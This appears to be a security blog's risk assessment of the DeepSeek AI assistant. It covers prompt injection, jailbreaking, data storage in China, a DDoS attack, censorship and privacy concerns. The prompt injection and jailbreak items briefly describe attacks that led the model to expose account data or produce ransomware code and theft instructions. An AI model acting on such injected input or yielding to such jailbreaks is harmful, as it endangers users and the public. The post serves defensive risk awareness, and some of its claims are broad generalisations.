Navigating the DeepSeek Dilemma: Security Risks and Key Vulnerabilities

Rapid DeepSeek Adoption Has Significant Risks

DeepSeek, a Chinese-developed AI platform, has captured global attention due to its innovative technology and cost-effective training methods. Its disruptive presence in the AI market has even impacted industry giants like Nvidia, highlighting its impact in reshaping the AI sector.

Epic Adoption Rates:

• App Store Dominance: Within just seven days of its launch, DeepSeek's R1 AI assistant model rose to the top spot in global app stores, surpassing even established players like OpenAI's ChatGPT - around 2.6 million as of January 27, 2025

• Viral Spread:  The platform has garnered substantial attention on social media and in the news, further fueling its popularity. Its competitive performance and cost-effectiveness compared to other AI models have been key drivers of this viral spread.

• Market Disruption: DeepSeek's emergence has sent shockwaves through the AI market, impacting the share prices of major tech companies like Nvidia. This indicates its potential to disrupt the industry and challenge existing players.

• User Base: While exact figures are not readily available, the app's top ranking in app stores suggests a considerable user base, likely numbering in the millions, given its global reach.
  

However, despite its appeal, DeepSeek comes with significant security concerns that both businesses and consumers must address. Indeed, given the recent TikTok ban in the US, heavy scrutiny should be applied in this context as well. As of today, below is a summary view of the current state use of DeepSeek.

Risk Log for DeepSeek Deployment or Utilization:

• Prompt Injection Attacks:  Prompt injection is a serious vulnerability where attackers manipulate the input given to a language model. In DeepSeek's case, this could allow malicious actors to gain control of user accounts, potentially accessing sensitive information like session cookies, past conversations, and even financial data if the platform is used for payments. This type of attack exploits the trust the system places in user-provided input, essentially tricking it into executing commands it shouldn't. While DeepSeek patched a specific vulnerability related to this in December 2024, the potential for similar exploits remains a concern, especially given the DDoS attack this week.
  

• Jailbreaking: Jailbreaking refers to bypassing the safety restrictions built into a language model. KELA, a cybersecurity firm, successfully jailbroke DeepSeek, demonstrating its ability to generate harmful outputs like ransomware code, instructions for creating dangerous substances, and fabricated content. This is a significant concern as it allows malicious actors to misuse the AI for illegal activities or to spread harmful information. The fact that DeepSeek could be tricked into providing detailed instructions for malicious activities like stealing credit card data highlights the potential consequences of this vulnerability.
  

• Transparency as a Vulnerability:  DeepSeek's approach of openly displaying its reasoning process, while intended to enhance transparency, inadvertently creates a security risk. By revealing its decision-making paths, DeepSeek provides valuable information to attackers who can then exploit these insights to manipulate the model or craft more effective attacks. This contrasts with other models like ChatGPT, which conceal their reasoning during inference, making them less susceptible to such attacks. This transparency makes DeepSeek more vulnerable to jailbreaks and adversarial attacks designed to force specific outputs.
  

• Cyber Hacking & Social Engineering: DeepSeek's advanced AI capabilities pose a serious threat in the wrong hands. Its ability to generate human-quality text, translate languages, and write different kinds of creative content can be exploited to create highly convincing phishing emails, spread disinformation, or manipulate individuals. Imagine hyper-realistic phishing messages tailored to individuals based on information gathered from data breaches, or large-scale disinformation campaigns designed to destabilize institutions – these are all potential misuse cases for DeepSeek.
  

• Data Privacy Concerns:
  

  • Data Storage in China:  DeepSeek stores user data on servers located in China. This is a major concern for users in Western countries due to China's data privacy laws, which differ significantly from those in the West, and the potential for government access to this data. This raises questions about the security and confidentiality of sensitive information, particularly in light of China's national intelligence laws that compel organizations to cooperate with state intelligence efforts.
    

  • Data Collection: DeepSeek collects a wide range of user data, including profile information, user input, technical information, usage information, cookies, and payment information. While some data collection is necessary for personalization and service improvement, the collection of sensitive information like user input and technical details raises concerns about potential privacy violations. This data could be used to build detailed user profiles or even be exploited for malicious purposes.
    

  • Data Breaches:  DeepSeek suffered a "large-scale malicious attack" this week, which disrupted services and forced the company to temporarily limit user registrations. Although DeepSeek claims existing users were not affected, this incident demonstrates the vulnerability of their systems and the potential for future data breaches. Also, see item 1 listed above.
    

• Cyberattacks: This cyberattack on DeepSeek, believed to be a distributed denial-of-service (DDoS) attack, highlights the platform's vulnerability. While the company stated that user data was not compromised in this instance, risk remains about the robustness of their security infrastructure and their ability to defend against future attacks.
  

• Open-Source Model: DeepSeek's open-source approach, while promoting transparency and community involvement, also presents a security challenge. Making the model's code freely available allows malicious actors to analyze it for vulnerabilities and develop exploits. This inherent trade-off between transparency and security is a key consideration for users of DeepSeek.
  

• Lack of Security Certifications: The absence of information about specific security certifications obtained by DeepSeek raises concerns about its commitment to security best practices and compliance with industry standards. This lack of transparency might deter businesses and consumers who prioritize security and compliance when choosing AI platforms.
  

• Limited Security Features: While DeepSeek mentions employing technical and organizational security measures, concrete details about these measures are scarce. This lack of transparency makes it difficult to assess the effectiveness of their security posture and raises questions about their ability to adequately protect user data.
  

• Unreliable Information: DeepSeek has been found to provide fabricated information, as evidenced by the incident where it generated false details about OpenAI employees. This unreliability raises concerns about the trustworthiness of the information provided by the model and its suitability for critical tasks.
  

• Potential for Censorship: As a Chinese company, DeepSeek is subject to censorship and government influence. This has resulted in restricted access to information, such as the Tiananmen Square tragedy which has already been confirmed within DeepSeek for example.
  

• IP Theft:  Given China's history of intellectual property theft, there are concerns that DeepSeek could be used to gather and exploit sensitive information, including trade secrets, proprietary code, or confidential research data. This poses a significant risk for businesses and researchers who utilize the platform.
  

We will be providing more detail on the actual threat vectors and other risks in future analysis and as further details are available.

Citations:

• Researchers Uncover Prompt Injection Vulnerabilities in DeepSeek and Claude AI. The Hacker News. December 2024. Source

• DeepSeek Blames Disruption on Cyberattack as Vulnerabilities Emerge. SecurityWeek. January 2025. Source

• Researchers Uncover Prompt Injection Vulnerabilities in DeepSeek and Claude AI. The Hacker News. December 2024. Source

• DeepSeek R1 Exposed: Security Flaws in China’s AI Model. KELA Cyber Blog. January 2025. Source

• DeepSeek AI Might Be the Best ChatGPT Rival—Here’s Why You Should Stay Away. BGR Tech. January 2025. Source

• Top-Rated Chinese AI App DeepSeek Limits Registrations Amid Cyberattacks. The Hacker News. January 2025. Source

• What Does DeepSeek’s Cyber Attack Mean for Data Privacy? Cyber Magazine. January 2025. Source